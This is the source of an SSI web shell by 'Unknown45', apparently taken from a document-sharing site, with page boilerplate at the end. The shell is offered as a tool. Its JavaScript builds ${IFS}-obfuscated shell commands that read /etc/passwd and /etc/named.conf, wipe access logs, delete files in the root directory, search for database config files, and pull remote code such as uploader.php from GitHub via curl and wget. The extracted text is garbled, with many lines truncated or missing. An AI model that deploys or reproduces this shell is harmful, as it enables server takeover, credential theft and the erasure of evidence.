Aaa

<!
-- Author : Unknown45 -->










<html>
<head>
<title>SSI Webshell</title>
<meta name="theme-color"
content="#000">
<meta name="Author"
content="Unknown45">
<meta name="description"
content="Security ? that just an
illusion - ">
<meta property="og:description"
content="Security ? that just an
illusion - ">
</head>
<script
src="https://ajax.googleapis.com/aj
ax/libs/jquery/3.5.1/jquery.min.js"></
script>
<script
src="https://cdn.jsdelivr.net/npm/pa
ce-js@latest/pace.min.js"></script>
<link rel="stylesheet"
href="https://cdn.jsdelivr.net/npm/p
ace-js@latest/pace-theme-
default.min.css">
<script language="javascript">
function unknown45()
{
var uri =
document.getElementById('comma
nd').value;
var rep = uri.replace(/[ ]/g,'$
{IFS}');
var res = encodeURI(uri);
document.location.href="?"+encodeURI(rep)+"&&test";
}
function refresh() {
#echo var=DOCUMENT_NAME -->";
}
function checkfile() {
-->?"+"ls${IFS}-la";
}
function readpass() {
var
selectedobj=document.getElement
ById('readpass');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
"none";
='hide';
}
}
function readnamed() {
var
ById('readnamed');
"block";
='show';
}else{
"none";
='hide';
}
}
function movefiles() {
var
ById('movefiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function upfiles() {
var
ById('upfiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function renamefiles() {
var
ById('renamefiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function deletefiles() {
var
ById('deletefiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function findfiles() {
var
ById('findfiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function addupload()
{
-->?"+"curl${IFS}-Ls$
{IFS}raw.githubusercontent.com/wh
oami-45/php-
code/main/uploader.php${IFS}|$
{IFS}tee${IFS}-a$
{IFS}uploader.php";
}
function checkroot() {
var uri = "ls -la ";
{IFS}');
-->?"+encodeURI(rep)+"";
}
function deletelog() {
var yakin = confirm("yakin hapus
access logs nya ?");
if (yakin == true) {
var uri = "rm -rf ";
{IFS}');
var=DOCUMENT_ROOT -->/../logs/
*";
} else {
return true;
}
}
function delsel() {
var uri = "rm -rf ";
{IFS}');
var=DOCUMENT_NAME --> |$
{IFS}clear${IFS}&&${IFS}echo$
{IFS}Done";
}
function movesatu()
{
-->?"+"mv$
{IFS}"+document.getElementById('
movefile').value+"$
{IFS}../"+document.getElementById(
'movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../"+document.getElementById(
'movefile').value;
}
function movedua()
{
-->?"+"mv$
movefile').value+"$
{IFS}../../"+document.getElementByI
d('movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../../"+document.getElementByI
d('movefile').value;
}
function movetiga()
{
-->?"+"mv$
movefile').value+"$
{IFS}../../../"+document.getElementB
yId('movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../../../"+document.getElementB
yId('movefile').value;
}
function moveroot()
{
-->?"+"mv$
movefile').value+"${IFS}/"+document.getElementById('m
ovefile').value+"${IFS}&&$
{IFS}realpath${IFS}/"+document.getElementById('m
ovefile').value;
}
function upfile()
{
var url =
document.getElementById('linknya')
.value;
var https =
url.split("https://").join("");
var http =
https.split("http://").join("");
-->?"+"wget$
{IFS}"+encodeURI(http)+"$
{IFS}"+"--no-check-certificate$
{IFS}&&${IFS}ls${IFS}-la";
}
function renamefile()
{
-->?"+"mv$
{IFS}"+document.getElementById('r
enameawal').value+"$
{IFS}"+document.getElementById('r
enameakhir').value+"${IFS}&&$
{IFS}ls${IFS}-la";
}
function deletefile()
{
-->?"+"rm${IFS}-rf$
{IFS}"+document.getElementById('d
eletefile').value+"${IFS}&&${IFS}ls$
{IFS}-la";
}
function deleteinroot()
{
var yakin = confirm("yakin hapus
file ini di directory root ?");
if (yakin == true) {
-->?"+"rm${IFS}-rf${IFS}"+"/"+document.getElementById('de
letefile').value+"${IFS}&&${IFS}ls$
{IFS}-la${IFS}";
} else {
return true;
}
}
function deletefiledua()
{
-->?"+"rm${IFS}-rf$
eletedir').value+"/"+document.getEl
ementById('deletefiledua').value+"$
{IFS}&&${IFS}ls${IFS}-la$
eletedir').value;
}
function findfile()
{
-->?"+"du${IFS}-ah${IFS}"+"|$
{IFS}grep$
{IFS}"+document.getElementById('fi
ndfile').value;
}
function findinroot()
{
-->?"+"du${IFS}-ah${IFS}"+"$
{IFS}"+"|${IFS}grep$
ndfile').value;
}
function findfiledua()
{
-->?"+"du${IFS}-ah$
nddir').value+"${IFS}|${IFS}grep$
ndfiledua').value;
}
function finddb()
{
-->?"+"du${IFS}-ah${IFS}"+"$
{IFS}"+"|${IFS}grep${IFS}-e$
{IFS}config.php${IFS}-e$
{IFS}database.php${IFS}-e$
{IFS}config.inc.php${IFS}-e$
{IFS}koneksi.php";
}
</script>
<style type="text/css">
.input {
background: transparent;
border-color: #ffffff;
border-width: thin;
border: groove;
cursor: pointer;
}
button {
cursor: pointer;
}
</style>
</head>
<body onload="checkaja()">
<font face=courier
size=2><i><center>SSI Webshell by
Unknown45<hr><font
face="courier" size=2>
<font size=2>Command : <input
type=text size=60 id=command
class="text" name="address1"
style="max-width: 100%; max-
height: 100%;"> <button
class="input" id="gas"
onclick="unknown45();">Execute</
button></center>
<br><br>Host : <b></b>
<br>Server Address : <b></b>
<br>User : <b></b>
<br>System : <b></b>
<br><br>Current Path : <b></b><br></i>
Python : <b></b> |
MySql : <b></b> |
Perl : <b></b> |
Ruby : <b></b> |
Wget : <b></b><hr>
<center><button
onclick="refresh()" style="float:
left;">Refresh</button> <button
onclick="checkfile()">list
file</button> <button
onclick="renamefiles()">rename
onclick="movefiles()">move
onclick="deletefiles()">delete
onclick="findfiles()">find
onclick="upfiles()">upload
onclick="delsel()" style="float:
right;">Remove
Shell</button><br><br>
<button
onclick="readpass();">read
/etc/passwd</button> <button
onclick="readnamed();">read
/etc/named.conf</button> <button
onclick="addupload()">add
uploader.php</button> <button
onclick="checkroot()">check root
directory</button> <button
onclick="deletelog()">delete access
logs</button></center>
<hr></i>
Executed Command :
</font><b><font face="courier"
id="cmd"></font></b><br>
<textarea bgcolor=#e4e0d8
cols=121 rows=15 style="width:
100%">

</textarea>
<script>
var cmd =
document.getElementById("cmd").i
nnerHTML.split("${IFS}").join(" ");
document.getElementById("cmd").i
nnerHTML = cmd;
var gaskan =
document.getElementById("comma
nd");
gaskan.addEventListener("keyup",
function(event) {
if (event.keyCode === 13) {
event.preventDefault();
document.getElementById("gas").cl
ick();
}
});
</script>
<font face="courier" size="2"
id="readpass"
style="display:none"><br>Read :
<b>/etc/passwd</b><br>
cols=121 rows=15></textarea>
</font>
id="readnamed"
style="display:none"><br>Read :
<b>/etc/named.conf</b><br>
cols=121 rows=15></textarea>
</font>
id="movefiles"
style="display:none"><br>Move file
to <b>previous
directory</b><br><br>
filename : <textarea
bgcolor="#e4e0d8" cols="25"
rows="1" id="movefile"
style="resize: none; outline: none"
required></textarea>
<button onclick="movesatu()">1
onclick="movedua()">2
onclick="movetiga()">3
onclick="moveroot()">root
directory</button>
</font>
id="renamefiles"
style="display:none"><br>Rename
<b>file</b><br><br>
<textarea bgcolor="#e4e0d8"
cols="25" rows="1"
id="renameawal" style="resize:
none; outline: none"
required></textarea> to <textarea
rows="1" id="renameakhir"
required></textarea><br><button
onclick="renamefile()">Gaskan</bu
tton>
</font>
id="upfiles"
style="display:none"><br>Upload
<b>file</b><br><br>
Link : <textarea
rows="1" id="linknya"
required></textarea> <button
onclick="upfile()">Gaskan</button>
</font>
id="deletefiles"
style="display:none"><br>delete
<b>file</b><br>
cols="25" rows="1" id="deletefile"
onclick="deletefile()">Delete</butto
n> <button
onclick="deleteinroot()">Delete this
in root
directory</button><br><br>delete
<b>file</b> in <b>custom
directories</b><br><textarea
rows="1" id="deletefiledua"
required></textarea> in directory
cols="25" rows="1" id="deletedir"
onclick="deletefiledua()">Delete</b
utton>
</font>
id="findfiles"
style="display:none"><br>find
<b>files</b><br>
cols="25" rows="1" id="findfile"
onclick="findfile()">Find</button>
<button onclick="finddb()">find
database location (beta)</button>
<button onclick="findinroot()">Find
this in root
directory</button><br><br>find
<b>files</b> in <b>custom
directories</b><br><textarea
rows="1" id="findfiledua"
required></textarea> in directory
cols="25" rows="1" id="finddir"
onclick="findfiledua()">Find</butto
n>
</font>
<hr>
<center>
<font face="courier"
size=2>Unknown45 - 2021<br><a
href="https://exploits.site"
target="_blank">https://exploits.site
</a></font></center>
</body>
</html>

Aaa

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Aaa

Uploaded by

Copyright:

Available Formats

<!

-- Author : Unknown45 -->

<!--#config errmsg="Error / Webnya

You might also like